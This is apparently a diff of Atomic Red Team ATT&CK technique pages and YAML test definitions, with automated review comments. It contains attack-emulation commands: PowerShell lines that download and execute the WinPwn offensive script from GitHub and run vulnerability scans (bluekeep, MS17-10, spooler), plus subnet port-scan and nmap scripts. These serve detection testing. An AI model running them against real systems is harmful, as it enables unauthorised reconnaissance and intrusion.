Adversaries may rename legitimate system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for system utilities adversaries are capable of abusing. (Citation: LOLBAS Main Site) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>). (Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
</blockquote>
## Atomic Tests
@@ -0,0 +1 @@
Wscript.Quit
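Review bot: the new one-line file containing only `Wscript.Quit` has no comment, so a reader of the T1036.003 directory cannot tell which atomic test consumes it or what it is meant to stand in for; add a leading `'` comment naming the test that uses it and its role.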
+6 -2
View File
@@ -1,8 +1,12 @@
# T1036.004 - Masquerading: Masquerade Task or Service
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/004)
<blockquote>Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
<blockquote>
Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)</blockquote>
Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.
Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)
</blockquote>
## Atomic Tests
+6 -2
@@ -1,8 +1,12 @@
# T1036.005 - Masquerading: Match Legitimate Name or Location
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005)
<blockquote>Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
<blockquote>
Adversaries may also use the same icon of the file they are trying to mimic.</blockquote>
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
Adversaries may also use the same icon of the file they are trying to mimic.
</blockquote>
## Atomic Tests
+6 -2
@@ -1,10 +1,14 @@
# T1036.006 - Masquerading: Space after Filename
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/006)
<blockquote>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
<blockquote>
Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.
For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed (Citation: Mac Backdoors are back).
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</blockquote>
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.
</blockquote>
## Atomic Tests
+6 -2
@@ -1,10 +1,14 @@
# T1036.007 - Masquerading: Double File Extension
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/007)
<blockquote>Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the systems policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension)
<blockquote>
Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the systems policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension)
Adversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a users system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)
Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.</blockquote>
Common file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.
</blockquote>
## Atomic Tests
+6 -2
@@ -1,8 +1,12 @@
# T1036 - Masquerading
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036)
<blockquote>Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
<blockquote>
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)</blockquote>
Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
</blockquote>
## Atomic Tests
+6 -2
@@ -1,8 +1,12 @@
# T1037.001 - Boot or Logon Initialization Scripts: Logon Script (Windows)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/001)
<blockquote>Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)
<blockquote>
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. </blockquote>
Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the <code>HKCU\Environment\UserInitMprLogonScript</code> Registry key.(Citation: Hexacorn Logon Scripts)
Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.
</blockquote>
## Atomic Tests
+6 -2
@@ -1,10 +1,14 @@
# T1037.002 - Boot or Logon Initialization Scripts: Logon Script (Mac)
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/002)
<blockquote>Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)
<blockquote>
Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the <code>/Library/Preferences/com.apple.loginwindow.plist</code> file and can be modified using the <code>defaults</code> command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissions to modify or create hooks.(Citation: Login Scripts Apple Dev)(Citation: LoginWindowScripts Apple Dev)
Adversaries can add or insert a path to a malicious script in the <code>com.apple.loginwindow.plist</code> file, using the <code>LoginHook</code> or <code>LogoutHook</code> key-value pair. The malicious script is executed upon the next user login. If a login hook already exists, adversaries can add additional commands to an existing login hook. There can be only one login and logout hook on a system at a time.(Citation: S1 macOs Persistence)(Citation: Wardle Persistence Chapter)
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) </blockquote>
**Note:** Login hooks were deprecated in 10.11 version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) and [Launch Agent](https://attack.mitre.org/techniques/T1543/001)
</blockquote>
## Atomic Tests
+6 -2
@@ -1,12 +1,16 @@
# T1037.004 - Boot or Logon Initialization Scripts: Rc.common
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/004)
<blockquote>Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like systems startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
<blockquote>
Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like systems startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.
Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)</blockquote>
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
</blockquote>
## Atomic Tests
+6 -2
@@ -1,10 +1,14 @@
# T1037.005 - Boot or Logon Initialization Scripts: Startup Items
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1037/005)
<blockquote>Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
<blockquote>
Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)
This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, <code>/Library/StartupItems</code> isnt guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.</blockquote>
An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.
</blockquote>
## Atomic Tests
+5 -1
@@ -1,6 +1,10 @@
# T1039 - Data from Network Shared Drive
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1039)
<blockquote>Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.</blockquote>
<blockquote>
Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.
</blockquote>
## Atomic Tests
+6 -2
@@ -1,6 +1,8 @@
# T1040 - Network Sniffing
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1040)
<blockquote>Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
<blockquote>
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
@@ -8,7 +10,9 @@ Network sniffing may reveal configuration details, such as running services, ver
In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)
On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)</blockquote>
On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `monitor capture`.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)
</blockquote>
## Atomic Tests
+5 -1
@@ -1,6 +1,10 @@
# T1041 - Exfiltration Over C2 Channel
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1041)
<blockquote>Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.</blockquote>
<blockquote>
Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.
</blockquote>
## Atomic Tests
+102 -29
@@ -1,10 +1,14 @@
# T1046 - Network Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1046)
<blockquote>Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
<blockquote>
Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a hosts registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)</blockquote>
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a hosts registered services on the network. For example, adversaries can use a mDNS query (such as <code>dns-sd -B _ssh._tcp .</code>) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley)
</blockquote>
## Atomic Tests
@@ -30,6 +34,8 @@ Within macOS environments, adversaries may use the native Bonjour application to
- [Atomic Test #11 - Remote Desktop Services Discovery via PowerShell](#atomic-test-11---remote-desktop-services-discovery-via-powershell)
- [Atomic Test #12 - Port Scan using nmap (Port range)](#atomic-test-12---port-scan-using-nmap-port-range)
<br/>
@@ -249,7 +255,6 @@ Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
```
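Review bot: dropping `$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'` leaves the remotely loaded script as the only place that variable could be set; confirm that WinPwn.ps1 at the pinned commit (121dcee26a7aca368821563cbe92b2b5638c5773) defines it itself or no longer reads it, because if any of the loaded functions build further download URLs from that base they will now fail when `spoolvulnscan -noninteractive -consoleoutput` runs. The identical removal is repeated in the MS17-10, bluekeep and fruit hunks below, so whichever way this is resolved applies to all four. The commit pin on the `iex(new-object net.webclient).downloadstring(...)` line is what keeps these tests reproducible; keep it.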
@@ -279,7 +284,6 @@ Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL funct
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
```
@@ -309,7 +313,6 @@ Search for bluekeep vulnerable Windows Systems in the domain using bluekeep func
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
```
@@ -339,7 +342,6 @@ Search for potentially vulnerable web apps (low hanging fruits) using fruit func
```powershell
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
```
@@ -424,7 +426,7 @@ The connection attempts to use a timeout parameter in milliseconds to speed up t
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ip_address | IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. | string | |
| ip_address | IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. A comma separated list of targe IPs is also accepted (useful to simulate a wider scan while only scanning key host e.g., honeypots) | string | |
| port_list | Comma separated list of ports to scan | string | 445, 3389|
| timeout_ms | Connection timeout in milliseconds | string | 200|
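Review bot: typos in the new `ip_address` description: "targe IPs" should read "target IPs" and "key host" should be "key hosts". The sentence would also be clearer if it stated the behaviour outright: when a comma separated list is supplied only those addresses are probed and no /24 sweep is performed, which is what the script change in the next hunk does.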
@@ -434,31 +436,56 @@ The connection attempts to use a timeout parameter in milliseconds to speed up t
```powershell
$ipAddr = "#{ip_address}"
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
$ports = #{port_list}
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
```
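Review bot: `elseif ($ipAddr -notlike "*,*")` is the exact negation of the preceding `if ($ipAddr -like "*,*")`, so the final `else { Write-Host "[Error] Invalid Inputs"; exit 1 }` branch is unreachable and the input is never actually validated. Either make it a plain `else`, or turn the condition into real validation (for example, check that each comma separated entry passes `[System.Net.IPAddress]::TryParse`) so that junk input reaches the error path. The two branches also duplicate the entire TcpClient connect loop; building one `$targets` array (the trimmed split list, or `1..254` expanded from `$subnetSubstring`) and looping once would halve the script and make the `Write-Host "[i] Establishing connection to: $ip : $port"` progress line consistent across both modes. Minor: `$tcp` is only closed on success; call `$tcp.Dispose()` after every connect attempt so a full /24 sweep does not leak sockets.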
@@ -495,4 +522,50 @@ Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
<br/>
<br/>
## Atomic Test #12 - Port Scan using nmap (Port range)
Scan multiple ports to check for listening ports with nmap
**Supported Platforms:** Linux, macOS
**auto_generated_guid:** 0d5a2b03-3a26-45e4-96ae-89485b4d1f97
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| host | Host(s) to scan. | string | 127.0.0.1|
| port_range | Port range(s) to scan. | string | 0-65535|
#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
```sh
nmap -Pn -sV -p #{port_range} #{host}
```
#### Dependencies: Run with `sh`!
##### Description: Check if nmap command exists on the machine
##### Check Prereq Commands:
```sh
if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
```
##### Get Prereq Commands:
```sh
(which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)||(which pkg && pkg install -y nmap)||(which brew && brew install nmap)
```
<br/>
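Review bot: the default `port_range` of `0-65535` combined with `-sV` means the default invocation runs a service-version scan of every port on `127.0.0.1`, which takes minutes rather than seconds and is a far heavier default than the other tests in this file; a narrower default (in the style of Test #11's `445, 3389`) or a note on expected runtime would help. "Elevation Required" also deserves a second look: `nmap -Pn -sV -p` runs fine unprivileged (nmap falls back to a TCP connect scan without root), so either drop the elevation flag or state that it is there to obtain a SYN scan rather than because the command needs it. The "Get Prereq Commands" line runs `apt-get install -y nmap` without a preceding `apt-get update`, which fails on a fresh image with an empty package index.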
+80 -30
@@ -131,7 +131,6 @@ atomic_tests:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
name: powershell
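Review bot: same change as the markdown hunk above in YAML form; the same question applies here, confirm the pinned WinPwn.ps1 sets `$S3cur3Th1sSh1t_repo` itself before this `spoolvulnscan` executor (and the three identical executors that follow) relies on its absence.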
@@ -142,7 +141,6 @@ atomic_tests:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
name: powershell
@@ -153,7 +151,6 @@ atomic_tests:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
name: powershell
@@ -164,7 +161,6 @@ atomic_tests:
- windows
executor:
command: |-
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
name: powershell
@@ -204,7 +200,7 @@ atomic_tests:
- windows
input_arguments:
ip_address:
description: IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine.
description: IP-Address within the target subnet. Default is empty and script tries to determine local IP address of attacking machine. A comma separated list of targe IPs is also accepted (useful to simulate a wider scan while only scanning key host e.g., honeypots)
type: string
default: ""
port_list:
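Review bot: same typos as in the markdown description: "targe IPs" should read "target IPs" and "key host" should read "key hosts"; fix them here as well so the two copies of the description stay identical.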
@@ -216,33 +212,58 @@ atomic_tests:
type: string
default: "200"
executor:
command: |
command: |-
$ipAddr = "#{ip_address}"
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
